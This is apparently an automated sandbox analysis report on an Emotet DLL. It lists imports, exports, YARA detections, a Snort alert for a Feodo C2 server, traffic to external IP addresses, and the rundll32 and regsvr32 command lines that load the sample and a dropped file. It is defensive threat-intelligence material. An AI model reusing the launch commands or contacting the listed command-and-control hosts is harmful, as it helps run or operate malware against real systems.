                                                                                                          RT_GROUP_CURSOR0x953780x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x958b80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x957680x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x960980x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x956180x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x95ca80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x954c80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x95b580x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x95df80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x95f480x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x961e80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x963380x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x964880x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_ICON0x632c00x14data
                                                                                                          RT_GROUP_ICON0x73f280x22data
                                                                                                          RT_GROUP_ICON0x73b000x14data
                                                                                                          RT_GROUP_ICON0x743600x22data
                                                                                                          RT_GROUP_ICON0x747980x22data
                                                                                                          None0x527080x1edata
                                                                                                          None0x521a00xadataSpanishMexico

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllRtlUnwind, GetSystemTimeAsFileTime, GetCommandLineA, TerminateProcess, HeapReAlloc, HeapSize, HeapDestroy, HeapCreate, VirtualFree, IsBadWritePtr, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, VirtualQuery, QueryPerformanceCounter, GetCurrentProcessId, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, SetStdHandle, SetEnvironmentVariableA, GetSystemInfo, VirtualAlloc, VirtualProtect, HeapFree, HeapAlloc, GetTickCount, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, GetOEMCP, GetCPInfo, GetShortPathNameA, CreateFileA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, DeleteFileA, MoveFileA, GetCurrentDirectoryA, GlobalFlags, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, InitializeCriticalSection, RaiseException, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, CloseHandle, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, FreeLibrary, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, LoadLibraryA, FreeResource, SetLastError, GlobalFree, FindResourceA, LoadResource, LockResource, SizeofResource, MulDiv, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, lstrcpynA, LocalFree, ExitProcess, GetStringTypeExA, CompareStringW, CompareStringA, lstrlenA, lstrcmpiA, GetVersion, GetLastError, WideCharToMultiByte, MultiByteToWideChar, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, UnhandledExceptionFilter, InterlockedExchange
                                                                                                          USER32.dllKillTimer, WindowFromPoint, GetDCEx, LockWindowUpdate, RegisterClipboardFormatA, PostThreadMessageA, SetRect, CharNextA, DestroyIcon, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, LoadCursorA, GetSysColorBrush, SetParent, GetSystemMenu, DeleteMenu, IsRectEmpty, IsZoomed, GetDC, ReleaseDC, LoadMenuA, DestroyMenu, UnpackDDElParam, ReuseDDElParam, ReleaseCapture, LoadAcceleratorsA, InsertMenuItemA, CreatePopupMenu, SetRectEmpty, BringWindowToTop, SetMenu, TranslateAcceleratorA, InvalidateRect, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, IsChild, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, LoadIconA, MapWindowPoints, TrackPopupMenu, SetForegroundWindow, SetTimer, GetClientRect, GetMenu, GetSysColor, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, GetClassInfoA, RegisterClassA, UnregisterClassA, DefWindowProcA, CallWindowProcA, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, GetWindow, SetWindowContextHelpId, MapDialogRect, wsprintfA, GetWindowTextLengthA, GetWindowTextA, SetWindowPos, CharUpperA, UpdateWindow, EnableWindow, SendMessageA, GetClassInfoExA, GetSubMenu, GetMenuItemCount, InsertMenuA, GetMenuItemID, AppendMenuA, SetFocus, ShowWindow, MoveWindow, SetWindowLongA, GetDlgCtrlID, SetWindowTextA, IsDialogMessageA, SendDlgItemMessageA, GetMenuItemInfoA, InflateRect, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, MessageBeep, GetNextDlgGroupItem, SetCapture, InvalidateRgn, CopyAcceleratorTableA, GetMenuStringA, GetMenuState, EndDialog, GetNextDlgTabItem, GetParent, IsWindowEnabled, GetDlgItem, GetWindowLongA, IsWindow, DestroyWindow, CreateDialogIndirectParamA, GetSystemMetrics, SetActiveWindow, GetActiveWindow, GetDesktopWindow, PostQuitMessage, PostMessageA, SetCursor, ShowOwnedPopups, GetLastActivePopup, MessageBoxA, ValidateRect, GetCursorPos, PeekMessageA, GetKeyState, IsWindowVisible, DispatchMessageA
                                                                                                          GDI32.dllCreateSolidBrush, CreateFontIndirectA, GetBkColor, GetTextColor, GetStockObject, GetRgnBox, PatBlt, SetRectRgn, CombineRgn, GetMapMode, CreatePatternBrush, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetPixel, BitBlt, GetWindowExtEx, CreateRectRgnIndirect, GetDeviceCaps, CreateRectRgn, SelectClipRgn, IntersectClipRect, ExcludeClipRect, SetMapMode, SetBkMode, RestoreDC, SaveDC, GetTextExtentPoint32A, GetTextMetricsA, CreateFontA, GetCharWidthA, DeleteObject, SelectObject, StretchDIBits, DeleteDC, CreateCompatibleDC, CreateCompatibleBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetViewportExtEx
                                                                                                          comdlg32.dllGetSaveFileNameA, GetFileTitleA, GetOpenFileNameA
                                                                                                          WINSPOOL.DRVOpenPrinterA, DocumentPropertiesA, ClosePrinter
                                                                                                          ADVAPI32.dllGetFileSecurityA, RegSetValueA, RegOpenKeyA, RegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, RegEnumKeyA, RegQueryValueA, RegCreateKeyExA, RegSetValueExA, RegDeleteValueA, RegCreateKeyA, RegCloseKey, SetFileSecurityA
                                                                                                          SHELL32.dllDragQueryFileA, ExtractIconA, SHGetFileInfoA, DragFinish
                                                                                                          COMCTL32.dllImageList_Draw, ImageList_GetImageInfo, ImageList_Destroy
                                                                                                          SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
                                                                                                          oledlg.dll
                                                                                                          ole32.dllCreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoTaskMemFree, OleUninitialize, CoFreeUnusedLibraries, CoRegisterMessageFilter, OleFlushClipboard, OleIsCurrentClipboard, CoRevokeClassObject, CoTaskMemAlloc, OleInitialize
                                                                                                          OLEAUT32.dllSysAllocStringLen, VariantClear, VariantChangeType, VariantInit, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy, SysFreeString

                                                                                                          Exports

                                                                                                          NameOrdinalAddress
                                                                                                          DllRegisterServer10x10005090
                                                                                                          DllUnregisterServerr20x100050c0

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          SpanishMexico

                                                                                                          Network Behavior

                                                                                                          Snort IDS Alerts

                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          192.168.2.651.91.76.894978580802404336 05/24/22-00:16:29.728687TCP2404336ET CNC Feodo Tracker Reported CnC Server TCP group 19497858080192.168.2.651.91.76.89

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          May 24, 2022 00:16:07.998691082 CEST49772443192.168.2.670.36.102.35
                                                                                                          May 24, 2022 00:16:07.998764992 CEST4434977270.36.102.35192.168.2.6
                                                                                                          May 24, 2022 00:16:07.998919964 CEST49772443192.168.2.670.36.102.35
                                                                                                          May 24, 2022 00:16:08.069855928 CEST49772443192.168.2.670.36.102.35
                                                                                                          May 24, 2022 00:16:08.069897890 CEST4434977270.36.102.35192.168.2.6
                                                                                                          May 24, 2022 00:16:08.244049072 CEST4434977270.36.102.35192.168.2.6
                                                                                                          May 24, 2022 00:16:08.248719931 CEST49773443192.168.2.670.36.102.35
                                                                                                          May 24, 2022 00:16:08.248790026 CEST4434977370.36.102.35192.168.2.6
                                                                                                          May 24, 2022 00:16:08.248917103 CEST49773443192.168.2.670.36.102.35
                                                                                                          May 24, 2022 00:16:08.249521017 CEST49773443192.168.2.670.36.102.35
                                                                                                          May 24, 2022 00:16:08.249553919 CEST4434977370.36.102.35192.168.2.6
                                                                                                          May 24, 2022 00:16:08.426064968 CEST4434977370.36.102.35192.168.2.6
                                                                                                          May 24, 2022 00:16:08.428622007 CEST49774443192.168.2.670.36.102.35
                                                                                                          May 24, 2022 00:16:08.428674936 CEST4434977470.36.102.35192.168.2.6
                                                                                                          May 24, 2022 00:16:08.428792953 CEST49774443192.168.2.670.36.102.35
                                                                                                          May 24, 2022 00:16:08.429620981 CEST49774443192.168.2.670.36.102.35
                                                                                                          May 24, 2022 00:16:08.430314064 CEST4434977470.36.102.35192.168.2.6
                                                                                                          May 24, 2022 00:16:08.430439949 CEST49774443192.168.2.670.36.102.35
                                                                                                          May 24, 2022 00:16:08.485352039 CEST497758080192.168.2.692.240.254.110
                                                                                                          May 24, 2022 00:16:11.487521887 CEST497758080192.168.2.692.240.254.110
                                                                                                          May 24, 2022 00:16:17.488179922 CEST497758080192.168.2.692.240.254.110
                                                                                                          May 24, 2022 00:16:29.728687048 CEST497858080192.168.2.651.91.76.89
                                                                                                          May 24, 2022 00:16:29.749305964 CEST80804978551.91.76.89192.168.2.6
                                                                                                          May 24, 2022 00:16:29.749504089 CEST497858080192.168.2.651.91.76.89
                                                                                                          May 24, 2022 00:16:29.877752066 CEST497858080192.168.2.651.91.76.89
                                                                                                          May 24, 2022 00:16:29.901202917 CEST80804978551.91.76.89192.168.2.6
                                                                                                          May 24, 2022 00:16:29.914437056 CEST80804978551.91.76.89192.168.2.6
                                                                                                          May 24, 2022 00:16:29.914465904 CEST80804978551.91.76.89192.168.2.6
                                                                                                          May 24, 2022 00:16:29.914571047 CEST497858080192.168.2.651.91.76.89
                                                                                                          May 24, 2022 00:16:37.081516981 CEST497858080192.168.2.651.91.76.89
                                                                                                          May 24, 2022 00:16:37.102925062 CEST80804978551.91.76.89192.168.2.6
                                                                                                          May 24, 2022 00:16:37.103045940 CEST497858080192.168.2.651.91.76.89
                                                                                                          May 24, 2022 00:16:37.112967014 CEST497858080192.168.2.651.91.76.89
                                                                                                          May 24, 2022 00:16:37.177175999 CEST80804978551.91.76.89192.168.2.6
                                                                                                          May 24, 2022 00:16:37.397949934 CEST80804978551.91.76.89192.168.2.6
                                                                                                          May 24, 2022 00:16:37.398036003 CEST497858080192.168.2.651.91.76.89
                                                                                                          May 24, 2022 00:16:40.401173115 CEST80804978551.91.76.89192.168.2.6
                                                                                                          May 24, 2022 00:16:40.401205063 CEST80804978551.91.76.89192.168.2.6
                                                                                                          May 24, 2022 00:16:40.401281118 CEST497858080192.168.2.651.91.76.89
                                                                                                          May 24, 2022 00:17:57.456446886 CEST497858080192.168.2.651.91.76.89
                                                                                                          May 24, 2022 00:17:57.456703901 CEST497858080192.168.2.651.91.76.89

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                          May 24, 2022 00:16:35.147722960 CEST8.8.8.8192.168.2.60xbc56No error (0)windowsupdatebg.s.llnwi.net95.140.236.128A (IP address)IN (0x0001)
                                                                                                          May 24, 2022 00:16:35.147722960 CEST8.8.8.8192.168.2.60xbc56No error (0)windowsupdatebg.s.llnwi.net178.79.242.0A (IP address)IN (0x0001)

                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:00:15:35
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll"
                                                                                                          Imagebase:0x1280000
                                                                                                          File size:116736 bytes
                                                                                                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:1
                                                                                                          Start time:00:15:36
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1
                                                                                                          Imagebase:0xed0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:00:15:36
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:regsvr32.exe /s C:\Users\user\Desktop\l2sFDHB0lp.dll
                                                                                                          Imagebase:0x9b0000
                                                                                                          File size:20992 bytes
                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.387530383.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.387530383.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.387558358.0000000004201000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.387558358.0000000004201000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:3
                                                                                                          Start time:00:15:36
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1
                                                                                                          Imagebase:0xee0000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.384161260.0000000004871000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.384161260.0000000004871000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:4
                                                                                                          Start time:00:15:36
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllRegisterServer
                                                                                                          Imagebase:0xee0000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.384631851.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.384631851.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:00:15:40
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllUnregisterServerr
                                                                                                          Imagebase:0xee0000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.388750186.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.388750186.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:6
                                                                                                          Start time:00:15:42
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhz"
                                                                                                          Imagebase:0x9b0000
                                                                                                          File size:20992 bytes
                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.896680035.0000000003190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.896680035.0000000003190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:12
                                                                                                          Start time:00:16:14
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                          Imagebase:0x7ff726010000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:13
                                                                                                          Start time:00:16:20
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff726010000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:17
                                                                                                          Start time:00:16:56
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff726010000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:20
                                                                                                          Start time:00:17:18
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff726010000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:22
                                                                                                          Start time:00:17:33
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff726010000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:3.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:7.7%
                                                                                                            Total number of Nodes:418
                                                                                                            Total number of Limit Nodes:16
                                                                                                            execution_graph 20455 10006600 69 API calls 20298 1002c000 29 API calls 20299 10025c00 38 API calls __lock 20300 10010c02 39 API calls 20302 1000d40a 45 API calls 2 library calls 20457 1001f60c 11 API calls 20305 10036c0c 49 API calls 20460 1000f210 86 API calls 3 library calls 20461 10004610 LoadLibraryA 20306 10032010 69 API calls 20307 10016815 36 API calls _rand 20463 10010a14 6 API calls __lock 20308 1000fc18 85 API calls 20464 1002fe1b 78 API calls 3 library calls 20309 10030018 69 API calls 20311 10031c1d 79 API calls 20466 1002561d 39 API calls 20467 1000a221 CopyRect 20468 10027621 70 API calls 20470 1002ca2a 38 API calls 20312 1000882b BitBlt 20471 10024629 37 API calls 20472 1000be2c CopyRect GetClientRect InterlockedIncrement 20473 10032a2d 7 API calls 20313 10001430 36 API calls 20474 10006630 115 API calls 20475 10022233 70 API calls 2 library calls 20314 10008434 RaiseException ctype 20315 1000c037 70 API calls __EH_prolog 20317 10028c3a SetViewportOrgEx SetViewportOrgEx 20318 10025438 37 API calls 20319 1002f03f 39 API calls 20320 10001440 35 API calls ctype 20479 10005240 72 API calls 20480 10006640 RaiseException EndDialog ctype 20481 1000d249 38 API calls 2 library calls 20322 1002084f 6 API calls ctype 20323 1000744e LocalFree 20483 10004650 GetProcAddress 20324 10008451 24 API calls 20484 10020657 RaiseException GetWindowLongA GetFocus ctype 20325 1000bc59 68 API calls 20327 1000885b PtVisible 20328 10034c5f 78 API calls __lock 20329 1000105d VirtualQuery GetSystemInfo VirtualQuery VirtualAlloc VirtualProtect 20486 1001aa5e 45 API calls __lock 20330 1000a862 52 API calls 20331 10007063 36 API calls ___free_lc_time 20332 10006c66 67 API calls 20333 10002468 ??3@YAXPAX 20334 10007469 RaiseException LocalAlloc ctype 20489 10038268 37 API calls __lock 20490 10031e6f 70 API calls 2 library calls 20336 10022c6f 67 API calls 20338 1000886f RectVisible 20492 10025a6d 49 API calls __lock 20493 10001a70 42 API calls ctype 20494 10004670 FreeLibrary 20339 10039070 PeekMessageA PeekMessageA PeekMessageA 20340 10031874 83 API calls 2 library calls 20341 10025478 37 API calls 20498 1000967a GetDlgItem 20342 1002b47f 46 API calls __lock 20343 1000887f TextOutA 20502 1002be83 44 API calls __lock 20344 1000ac82 86 API calls 20346 10028c86 OffsetViewportOrgEx OffsetViewportOrgEx 20504 10032286 71 API calls 20347 10024c8e 50 API calls 2 library calls 20507 1001d28c 74 API calls ctype 20028 10005090 20029 100050a0 20028->20029 20030 10005099 ExitProcess 20028->20030 20033 10004780 20029->20033 20034 1000495d 20033->20034 20035 10004869 20033->20035 20035->20034 20036 10004c84 bsearch 20035->20036 20037 100049ec malloc 20035->20037 20036->20034 20037->20034 20038 10004b0b qsort 20037->20038 20038->20036 20349 10007090 GlobalAlloc 20350 10001090 GetThreadLocale GetLocaleInfoA GetACP 20351 1000dc90 36 API calls 3 library calls 20508 10026a96 67 API calls 20509 10037a96 6 API calls 20510 1000c29a VariantClear SysFreeString SysFreeString SysFreeString _rand 20353 1000889b ExtTextOutA 20512 1000be9c GetClientRect CopyRect 20514 100336a6 67 API calls ctype 20356 1001d8a6 48 API calls 20357 100344ad 26 API calls 20515 1002f6ad 10 API calls 20517 100342b3 SetBkColor ExtTextOutA 20518 1000aeb3 67 API calls ctype 20359 1000e4b6 45 API calls 2 library calls 20519 10008eb6 GetWindowTextA lstrcpynA lstrlenA 20360 100040b9 realloc IsBadReadPtr 20361 1000e8b9 80 API calls 2 library calls 20362 100084bb 66 API calls 20364 100088c0 TabbedTextOutA 20365 100254c3 39 API calls 20521 10020ac0 DefWindowProcA CallWindowProcA 20522 10006ec5 45 API calls 20523 10030ec9 166 API calls 20524 100376cf EnterCriticalSection LeaveCriticalSection 20368 100050d0 134 API calls 20369 10028cd2 SetViewportExtEx SetViewportExtEx 20525 1001fad1 69 API calls ctype 20526 1002d2d6 91 API calls 20370 1002ccd7 48 API calls 20528 1000aadb GetWindowLongA SetWindowLongA SetWindowPos 20533 100012e0 EnableWindow 20534 10038ae0 76 API calls ctype 20372 100084e7 66 API calls 20536 10029ae8 37 API calls __lock 20373 1002c0ed 71 API calls __lock 20374 1000c0ef ReleaseDC 20537 1000beef 71 API calls __EH_prolog 20375 100014f0 47 API calls 20376 100288f3 69 API calls 20378 100344f5 